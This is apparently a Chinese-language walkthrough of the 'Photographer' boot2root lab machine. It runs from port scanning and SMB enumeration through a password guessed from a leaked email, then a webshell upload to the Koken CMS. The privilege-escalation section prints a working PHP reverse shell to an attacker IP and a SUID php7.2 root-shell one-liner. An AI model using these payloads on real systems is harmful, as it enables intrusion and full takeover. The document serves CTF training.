靶机下载地址:戳我
This machine was developed to prepare for OSCP. It is boot2root, tested on VirtualBox (but works on VMWare) and has two flags: user.txt and proof.txt.
0x00 信息收集
查看靶机信息可得其ip地址为192.168.237.132。
对端口进行扫描:
PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 8000/tcp open http Apache httpd 2.4.18 MAC Address: 00:0C:29:C1:54:75 (VMware) Service Info: Hosts: PHOTOGRAPHER, example.com
8000端口和80被wappalyzer识别出使用的CMS为Koken,后台存在文件上传漏洞,但是现在还登陆不进去。
有一个可疑的shell.php:
存在后台登陆界面:
使用enum4linux枚举信息。发现存在共享:
[+] Attempting to map shares on 192.168.237.132 //192.168.237.132/print$ Mapping: DENIED, Listing: N/A //192.168.237.132/sambashare Mapping: OK, Listing: OK //192.168.237.132/IPC$ [E] Can't understand response: NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*
存在两个用户名,分别是daisa和agi。
[+] Enumerating users using SID S-1-22-1 and logon username '', password '' S-1-22-1-1000 Unix User\daisa (Local User) S-1-22-1-1001 Unix User\agi (Local User)
0x01 获取权限
尝试匿名访问共享,成功得到文件mailsent.txt和wordpress备份文件。
mailsent.txt:
Message-ID: <4129F3CA.2020509@dc.edu> Date: Mon, 20 Jul 2020 11:40:36 -0400 From: Agi Clarence <agi@photographer.com> User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.0.1) Gecko/20020823 Netscape/7.0 X-Accept-Language: en-us, en MIME-Version: 1.0 To: Daisa Ahomi <daisa@photographer.com> Subject: To Do - Daisa Website's Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Hi Daisa! Your site is ready now. Don't forget your secret, my babygirl ;)
通过邮件得到邮箱daisa@photographer.com,关键词Daisa、secret、babygirl等,经过尝试,使用该邮箱和密码babygirl可成功登陆8000端口的后台管理。
Import content→上传🐎→抓包拦截→修改后缀名
复制前台的【Download File】的连接,发现🐎已经成功上传。
成功获得user.txt中的内容^^
0x02 提升权限
bp不太好操作,反弹shell挪进来。(问就是手贱把题目内置的shell删掉了
<?php $ip = '192.168.237.131'; $port = '9982'; $sock = fsockopen($ip, $port); $descriptorspec = array( 0 => $sock, 1 => $sock, 2 => $sock ); $process = proc_open('/bin/sh', $descriptorspec, $pipes); proc_close($process); ?>
找到正在系统上运行的所有SUID可执行文件:
find / -user root -perm -4000 -print 2>/dev/null
发现php7.2,查资料得知:
我们需要它以root权限执行,所以:
/usr/bin/php7.2 -r "pcntl_exec('/bin/sh', ['-p']);"
在/root文件夹下得到proof.txt: